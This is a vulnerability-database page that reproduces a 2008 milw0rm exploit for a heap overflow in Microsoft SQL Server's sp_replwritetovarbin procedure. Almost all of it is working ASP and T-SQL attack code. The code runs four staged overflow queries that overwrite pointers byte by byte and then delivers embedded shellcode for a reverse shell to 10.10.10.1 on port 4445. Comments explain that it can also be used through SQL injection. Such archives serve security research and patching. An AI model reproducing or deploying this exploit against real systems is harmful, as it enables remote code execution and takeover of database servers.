Vulners
Lucene search
Microsoft SQL Server - 'sp_replwritetovarbin()' Heap Overflow
<html>
<%
// k`sOSe 12/17/2008
// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
// the change allows multiple shots :)
//
// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.
// Take a look at the comments in T-SQL
On Error Resume Next
// change this
UserName = "r00t"
Password = "t00r"
// ########################################### FIRST QUERY
SQL = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 3020 "&_
"BEGIN "&_
" SET @counter = @counter + 1 "&_
" IF @counter = 2900 "&_
" BEGIN "&_
" SET @val = CHAR(0x43) "&_
" END "&_
" ELSE IF @counter = 299 "&_
" BEGIN "&_
" SET @val = CHAR(0x42) "&_
" END "&_
" ELSE IF @counter = 300 "&_
" BEGIN "&_
" /* First byte overwritten here. This is a random writable address */ "&_
" SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
" CONTINUE "&_
" END "&_
" SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_
"EXEC master..sp_executesql @buf"
// ########################################### SECOND QUERY
SQL2 = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 3097 "&_
"BEGIN "&_
" SET @counter = @counter + 1 "&_
" IF @counter = 2900 "&_
" BEGIN "&_
" SET @val = CHAR(0x43) "&_
" END "&_
" ELSE IF @counter = 299 "&_
" BEGIN "&_
" SET @val = CHAR(0x42) "&_
" END "&_
" ELSE IF @counter = 300 "&_
" BEGIN "&_
" /* Second byte overwritten here */ "&_
" SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
" CONTINUE "&_
" END "&_
" SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_
"EXEC master..sp_executesql @buf"
// ########################################### THIRD QUERY
SQL3 = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 3021 "&_
"BEGIN "&_
" SET @counter = @counter + 1 "&_
" IF @counter = 2900 "&_
" BEGIN "&_
" SET @val = CHAR(0x43) "&_
" END "&_
" ELSE IF @counter = 299 "&_
" BEGIN "&_
" SET @val = CHAR(0x42) "&_
" END "&_
" ELSE IF @counter = 300 "&_
" BEGIN "&_
" /* Third byte overwritten here */ "&_
" SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
" CONTINUE "&_
" END "&_
" SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_
"EXEC master..sp_executesql @buf"
// ########################################### FOURTH QUERY
SQL4 = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 2708 "&_
"BEGIN "&_
" SET @counter = @counter + 1 "&_
" IF @counter = 2900 "&_
" BEGIN "&_
" SET @val = CHAR(0x43) "&_
" END "&_
" IF @counter = 108 "&_
" BEGIN "&_
" /* this is the pointer we wrote - 0x38. It points to a CALL ECX */ "&_
" SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_
" /* realign code */ "&_
" SET @buf = @buf + CHAR(0xe1) "&_
" /* realign the stack */ "&_
" SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc) "&_
" /* jump ahead */ "&_
" SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
" SET @counter = @counter + 12 "&_
" CONTINUE "&_
" END "&_
" ELSE IF @counter = 299 "&_
" BEGIN "&_
" SET @val = CHAR(0x42) "&_
" END "&_
" ELSE IF @counter = 300 "&_
" BEGIN "&_
" /* Fourth byte overwritten here */ "&_
" SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
" /* reverse shell on 10.10.10.1:4445 */ "&_
" SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6) "&_
" CONTINUE "&_
" END "&_
" SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_
"EXEC master..sp_executesql @buf"
Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")
phase = Request.Querystring("p")
if phase then
if phase = 1 then
rs.open SQL3, oConnection
rs.close
oConnection.Close
Set oConnection = Nothing
Response.Redirect("sql-exploit.asp?p=2")
elseif phase = 2 then
rs.open SQL4, oConnection
rs.close
oConnection.Close
Set oConnection = Nothing
Response.Redirect("sql-exploit.asp?p=3")
end if
Else
rs.open SQL, oConnection
rs.close
oConnection.Close
Set oConnection = Nothing
Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")
rs.open SQL2, oConnection
rs.close
oConnection.Close
Set oConnection = Nothing
Response.Redirect("sql-exploit.asp?p=1")
end if
%>
</html>
# milw0rm.com [2008-12-17]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2008 00:00Current
7.4High risk
Vulners AI Score7.4